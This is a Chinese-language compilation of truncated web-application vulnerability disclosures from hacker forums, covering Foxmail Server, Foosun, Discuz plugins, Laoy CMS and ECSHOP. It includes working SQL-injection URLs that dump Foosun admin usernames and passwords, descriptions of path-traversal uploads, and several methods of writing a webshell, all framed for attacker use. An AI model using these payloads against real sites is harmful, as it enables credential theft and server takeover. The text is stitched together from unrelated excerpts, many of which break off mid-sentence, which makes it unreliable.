Foxmail Server是专为国人设计的邮件服务器软件,提供多种邮件服务，用户可以用Foxmail、Outlook等客户端软件收发邮件，也可以在美观易用的中文Web界面上登陆处理邮件。 user/download.asp存在任意文件下载漏洞 user/filesMain.asp?fmFileType=image文件上传漏洞 由于文件上传到的目录是虚拟目录,所以不可以执行。但是我们通过上传的变量修改成../../../跳转到web目录

漏洞介绍：uchome

foosun最新SQL注入漏洞爆管理员帐号密码 风讯foosun的注册文件存在漏洞。黑客们可以暴管理员帐号和密码。 漏洞文件：http://www.xxxx.com/user/SetNextOptions.asp 利用简单的方法： 暴管理员帐号： http://www.xxxx.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1admin_name345678++from+FS_MF_Admin 暴管理员密码： http://www.xxxx.com/user/SetNextOptions.asp?sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1admin_pass_word34567...

作者：闷豆

发布作者：knife 影响版本：2.4.4 官方地址：www.discuz.net 漏洞类型：SQL注入 插件：video tube 1.85 以下 （只测试了 1.85） 漏洞文件：reportvideopopup.php vid 变量 过滤不严格 产生 SQL Injection if (isset($_GET['vid'])) $vid = $_GET['vid']; //你懂的 if (isset($_POST['postreport'])) $op = ‘postreport’; if (isset($_POST['reportclose'])) $op = ‘reportclose’; if (isset($_GET['op'])) $op = $_GET['op']; if (isset($_POST['op'])) $op = $_POST['op']; switch($o...

很多人有了，流传出来了，然后发出来。现在的漏洞，如果主动公布的，肯定是“无鸡肋不公布”，否则肯定是藏着，除非别人公布了。DZ的鸡肋在于需要创建者的权限（创建者的密码一般比较难搞），pw的鸡肋在于需要截断（或者linux旁注写一个shell到tmp下）。 一、discuz后台settings.inc.php中写shell漏洞： 漏洞详情： if($operation == ”uc” && is_writeable(”./config.inc.php”) && $isfounder) { $ucdbpassnew = $settingsnew[''uc''][''dbpass''] == ”********” ? UC_DBPW : $settings...

发布日期：2010-09.23 发布作者：路人甲 影响版本：老Y文章管理系统 v2.5 sp2 官方地址：http://www.laoy8.cn/ 漏洞类型：SQL注入,Cookies欺骗 漏洞描述：老Y文章管理系统 v2.5 sp2的/user/UserLogin.asp文件存在一个SQL注射漏洞，导致恶意用户可以通过漏洞得到数据库的任何数据。另外后台登陆处理不当，导致通过伪造管理账号密码以及管理员IP即可欺骗登陆后台。 漏洞测试exp:

ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护，为您提供及时高效的技术支持，您还可以根据自己的商务特征对ECSHOP进行定制，增加自己商城的特色功能。（官方介绍）
ECSHOP前段时间出了个注射漏洞：http://bbs.wolvez.org/topic/67/，拿后台权限应该没有问题，但文章没有提及如何在后台拿shell。昨天可乐在t00ls.Net上发帖问如何拿shell，无聊中我baidu、google了下，网上貌似没有拿shell的办法。好久没读代码了，无聊中下了ECSHOP最新版（V2.6.2）的源码过来读，很庆幸，给我找到一个可以直接写shell的文件。与注射一样，同样是个变化未初始化导致的问题，于是，同样只能用在register_globals为on的环境下。